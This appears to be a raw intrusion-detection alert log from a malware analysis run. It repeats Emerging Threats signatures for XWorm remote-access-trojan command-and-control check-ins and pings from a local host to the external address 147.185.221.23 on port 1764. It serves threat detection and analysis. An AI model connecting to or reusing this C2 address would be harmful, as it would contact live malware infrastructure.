                                                                                        2024-10-13T19:12:06.235595+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.359315+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.359315+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.414663+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.414663+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.468748+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.468748+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.531166+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.531166+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.593702+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.593702+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.656311+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.656311+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.719237+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.719237+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.766067+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.766067+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.860147+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.860147+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.875083+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.875083+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.985208+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.985208+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.995198+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:06.995198+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.112189+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.112189+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.122277+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.122277+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.236106+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.236106+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.243518+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.243518+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.359736+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.359736+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.370006+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.370006+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.488322+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.488322+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.498778+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.498778+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.614910+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.614910+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.634326+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.634326+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.762718+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.762718+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.770309+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.770309+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.888843+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.888843+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.899902+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:07.899902+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.026691+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.026691+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.034864+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.034864+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.171861+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.171861+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.171990+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.171990+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.291309+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.291309+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.301024+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.301024+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.436985+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.436985+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.469876+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.469876+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.569793+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.569793+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.612440+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.612440+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.693401+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.693401+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.747892+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.747892+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.836868+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.836868+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.924912+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:08.924912+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.041410+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.041410+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.103592+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.103592+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.243091+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.243091+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.298114+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.298114+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.649716+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.649716+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.810227+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:09.810227+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.036205+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.036205+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.172361+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.172361+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.247033+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.247033+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.370431+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.370431+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.511725+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.511725+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.539006+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.539006+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.677557+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.677557+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.690879+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.690879+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.805717+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.805717+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.835119+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.835119+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.941516+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:10.941516+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.016661+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.016661+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.064274+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.064274+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.161218+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.161218+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.201551+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.201551+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.312756+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.312756+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.317568+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.317568+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.442153+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.442153+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.450892+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.450892+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.574635+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.574635+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.587271+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.587271+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.720818+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.720818+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.747844+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.747844+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.988065+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:11.988065+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.137160+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.137160+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.251002+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.251002+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.281229+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.281229+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.375056+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.375056+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.399330+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.399330+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.499961+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.499961+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.532891+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.532891+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.643206+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.643206+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.679769+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.679769+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.765617+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.765617+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.798590+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.798590+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.968776+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.968776+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.974143+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:12.974143+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.095426+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.095426+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.120579+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.120579+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.240100+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.240100+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.290573+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.290573+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.418353+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.418353+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.464398+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.464398+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.562549+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.562549+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
